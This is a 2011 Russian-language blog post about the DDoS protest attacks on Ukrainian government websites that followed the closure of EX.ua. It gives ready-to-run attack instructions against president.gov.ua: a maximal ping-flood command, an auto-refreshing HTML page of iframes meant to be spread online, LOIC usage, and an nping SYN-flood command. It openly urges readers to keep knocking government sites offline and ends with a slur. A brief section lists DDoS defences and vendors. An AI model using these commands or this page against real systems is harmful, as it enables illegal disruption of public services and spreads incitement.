Способы и примеры DDOS атак - Операція відплата за EX.ua :)

Способы и примеры DDOS атак Сьогодні 02.02.2011, близько 18:00 припинив роботу офіційний сайт Президента України. Згодом, приблизно о 18:50 сайт перестав працювати сайт Партії регіонів, розпочалися технічні проблеми на сайті Кабінету Міністрів України, потім накрився мідним горщиком сайт МВС. Усі атаки пов’язують із закриттям популярного сервісу обміну файлами EX.ua. Ймовірною причиною зупинки роботи сайту є хакерські атаки.

Корчинский предлагает на этом не останавливатся и завалить сайт Гидрометцентра в знак протеста против холодной погоды:)

«Напряжение нарастает. Любой шаг властей вызывает раздражение или ненависть к ней, причем у всех. Януковичу наконец удалось объединить нацию в ненависти к себе. Реакция в интернете - это продолжение того, что происходит у нас на кухнях, на улицах и базарах, - отмечает также он. - Наконец и у нас что-то случилось настоящее и взрослое. Об этом будет написано в учебниках истории как пример гражданского сопротивления. Это рекорд, что за два дня упало столько властных сайтов. Интернет предоставляет новые возможности для самоорганизации, которые наконец украинская общественность стала использовать. Украинцам есть чем гордиться перед греками и египтянами. По крайней мере в онлайне мы не хуже, чем они в оффлайне».

«Общество уже не первый раз посылает сигналы. Но нынешняя власть просто не реагирует. У нее какая-то упрямая позиция. Она часто наезжает на граждан, но когда встречается с сопротивлением, то отступает, чтобы наехать снова. У нее простые реакции одноклеточного организма. Пока это эффективно. По крайней мере, они у власти, а не мы, - резюмирует господин Корчинский. - Власть как бы уже сделала шаг назад, начала бросать подачки. Менты говорят, что возвращают серверы, дадут возможность работать ресурсу EX.UA. Но, на мой взгляд, не стоит на это вестись. Надо развивать успех, валить все сайты власти… Революцию нельзя останавливать, надо идти как можно дальше, пока она не иссякнет. Я предлагаю завалить сайт Гидрометцентра в знак протеста против холодной погоды».

Примерно таким образом гудит Интернет и новости, мол хакеры атаковали, небольшая поправка - это были не хакеры, а обычные какеры или просто флудерасты :)) Хакерами нынче стали называть всех, кто знает где левая, а где правая клавиша мыши и может нажать на кнопку под надписью "Операція відплата за EX.ua", нэтбуки стали называть ноутбуками, каталоги и директории теперь принято величать папками..., всё перевернулось с ног на голову - ну, да ладно...

О флудерастах :) Флудераст (какер) тоже может быть почётным званием и это зависит от цели которую он приследует, а положить сервера преза, кабмина, мвс и прочих паразитов - цель благородная, достойна уважения и почитания. Причин для такой цели у каждого из нас может быть множество и это не обязательно "відплата за EX.ua", так, что не стоит на этом останавливатся.

Ниже мы постараемся перечислены способы при помощи которых можно зафлудерасить жертву и отправить её в даун.

Способы DDOS атак

Технически атаки DDOS реализуются тремя различными способами:

  • * Наименее опасный и кратковременный — «слэшдот-эффект», или публикация ссылки на «атакуемый» сайт на популярном сетевом ресурсе. По сути, это не атака, и мы включаем ее в общий список просто по причине сходства последствий (а также технических средств, предназначаемых для защиты от вредоносных действий).
  • Редкий, но достаточно мощный по своим последствиям, — организация атак DDOS при помощи специального ПО, добровольно запускаемого пользователями-волонтерами на своих компьютерах по всему миру. Наиболее известный пример — атака DDOS анонимных активистов, которые мстили международным платежным системам за отказ в обслуживании WikiLeaks.
  • Самый распространенный и неприятный — управляемые злоумышленниками атаки DDOS, организуемые через компьютеры, которые заражены компьютерными вирусами/червями. В современной терминологии такие дистанционно управляемые компьютерные вирусы называются ботами, а их сети — ботнетами.

PING-флуд с помощью ICMP-пакетов.

Для выполнения ICMP-флуда следует в коммандной строке выполнить 

ping -n 4294967295 -l 65500 president.gov.ua
  • -n - Число отправляемых запросов.
  • -l - Размер буфера отправки.

Число отправляемых запросов и Размер буфера отправки выставляем максимально возможное, а Time To Live в минимально возможное это интервал ожидания для запроса, так как нам не нужен результат ответа - мы ведь просто флудим:)

Сначала просто проверьте отвечает ли хост ping president.gov.ua, если хост отвечает, то попробуйте с максимальным размером пакета "-l 65500":

ping -n 4294967295 -l 65500 president.gov.ua

Если в ответ получим "Превышен интервал ожидания для запроса.", то уменьшим размер пакета до "-l 40000" это должно заработать, а если нет, то ещё немного уменьшаем размер пакета.

HTTP-флуд с помощью браузера

Метод придельно прост. Например наш HTTP-флуд направлен на сайт "president.gov.ua", создадим файл напрмер с именем "hack.html" и поместим в него ниже приведённый код:

<html>
<head>
<title>П.ЗД.Ц ДИКТАТУРЕ!!!</title>
<meta http-equiv="refresh" content="3; url=hack.html" />
</head>
<body>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
<iframe src="http://www.president.gov.ua/" height="100%" width="100%" name="torba"></iframe>
</body>
</html>

Для тех кому не понятно - в HTML теге meta устанавливается время через которое будет обновлятся страница и имя обновляемой страницы соответственно, в нашем случае это локальная страница "hack.html". В теле страницы находятся фреймы iframe загружаемые нужные нам страницы сайта, в нашем случае это www.president.gov.ua. Этот HTML код можно запастить в http://pastehtml.com/, а полученную ссылку раздать по миру.

Ещё один способ HTTP-флуда - это использование специального софта такого как например LOIC (Low Orbit Ion Cannon). LOIC для своей работы требует наличия установленного .NET Framework 4. Запустив программу, в её поля следует просто ввести УРЛ жертвы, номер порта (80 по умолчанию), количество потоков и аста ла виста. Загрузить её можно тут:

TCP SYN-флуд

Можно пофлудить при помощи nping которая входит в состав Nmap:

nping --unprivileged --delay 1s -c 999999999 --tcp-connect --flags SYN -p 80 president.gov.ua
  • --unprivileged - Предполагается что пользователь не имеет доступа к raw socket
  • --delay 1s - задержка между попытками
  • -c 999999999 - количество попыток
  • --tcp-connect - Непривилегированное TCP соединение
  • --flags SYN - тип TCP соединения SYN (Synchronize sequence numbers)

В итоге получим TCP SYN-флуд — при данном виде флуд-атаки на атакуемый узел направляется большое количество SYN-пакетов по протоколу TCP (запросов на открытие соединения). При этом на атакуемом компьютере через короткое время исчерпывается количество доступных для открытыя сокетов (програмных сетевых гнезд, портов) и сервер перестаёт отвечать.

Способы защиты от DDOS атак

Какие же существуют стратегии борьбы с атакой DDOS — теоретические и практические? Их не так много и сводятся они к следующим вариантам действий:

  • интеллектуальная обработка входящих запросов (фильтрация входящего потока с целью выявления «мусорных» запросов — задача нетривиальная; например, для так называемой атаки SYN flood используются SYN cookie);
  • стратегия «большой трубы» (наращивание мощностей для обработки входящих запросов в надежде, что рост производительности оборудования и ПО превысит увеличивающееся количество запросов, спровоцированных атакующей стороной);
  • стратегия защиты на ближних подступах (оповещение своего интернет-провайдера об IP-адресах, подлежащих фильтрации) и контратаки на дальних (интернет-провайдера атакующей стороны извещают о ведущейся атаке и просят помочь осуществить санацию атакующих компьютеров от вредоносного ПО).

Антикриминальная стратегия — действия по поимке и уголовному наказанию организаторов и исполнителей атаки DDOS — не рассматривается, поскольку в нынешних условиях представляется утопичной. Примеры успешной реализации этой стратегии крайне редки.

Что можно сказать по поводу эффективности каждой из перечисленных стратегий? Их действенность определяется доступными ресурсами, а также уровнем заинтересованности третьих лиц, которых атакуемая сторона стремится вовлечь в процесс.

С недавних пор появились сервисы предлагающие услуги по защите сайтов от DDOS атак, такие как например:

  • Prolexic (http://www.prolexic.com/) — специализированная компания, осуществляющая очистку клиентского трафика от DDOS-мусора;
  • Armoraid (http://www.armoraid.com) — еще одна специализированная компания;
  • лаборатория Tison (http://www.tison.ru/index16.html) предоставляет защиту бесплатно, в исследовательских целях;
  • антиDDOS-решение от «Лаборатории Касперского» (http://www.kaspersky.ru/ddos-prevention).

Сайты органов власти, собственно как и сама власть, нам, простым-рабочим людям, нафиг ненужны ибо власть - это кравасиси, паразитирующие на теле простого народа. Власть всегда защищала, защищает и защищать будет только сама себя и свои кошельки, а до простых людей им нет никакого дела и поэтому, как и пан Корчинский, я тоже предлагаю не останавливатся на достигнутом и продолжать валить сайты органов власти!

P.S. Флудерасты всех стран объединяйтесь и валите пидерастов!

Об авторе
АдМинь БагоИскатель
АдМинь БагоИскатель ярый борец за безглючную работу любых механизмов и организмов во всей вселенной и потому пребывает в вечном поиске всяческих багов, а тот кто ищет как известно всегда находит. Когда что-то или кого-то вылечить не в состоянии, то со словами "Я в аду, а вы все черти" уходит в запой выйдя из которого снова берётся лечить неизлечимое.
Ещё статьи автора

Комментарии   

Гениальный
0 #2 Гениальный 22.04.2013 18:59
Анонимус помогите)), вот мой скайп " l21234.com" ....Пишите ,если найдете. Буду рад =)
Цитировать
Антон Вялый
0 #1 Антон Вялый 22.02.2012 09:28
Ну так давайте их флудерасить каждую пятницу - Анонимус говорили, что помогут :lol:
Цитировать

Добавить комментарий


Защитный код
Обновить

no-script
[ Подробнее... ]
13.5 megabytes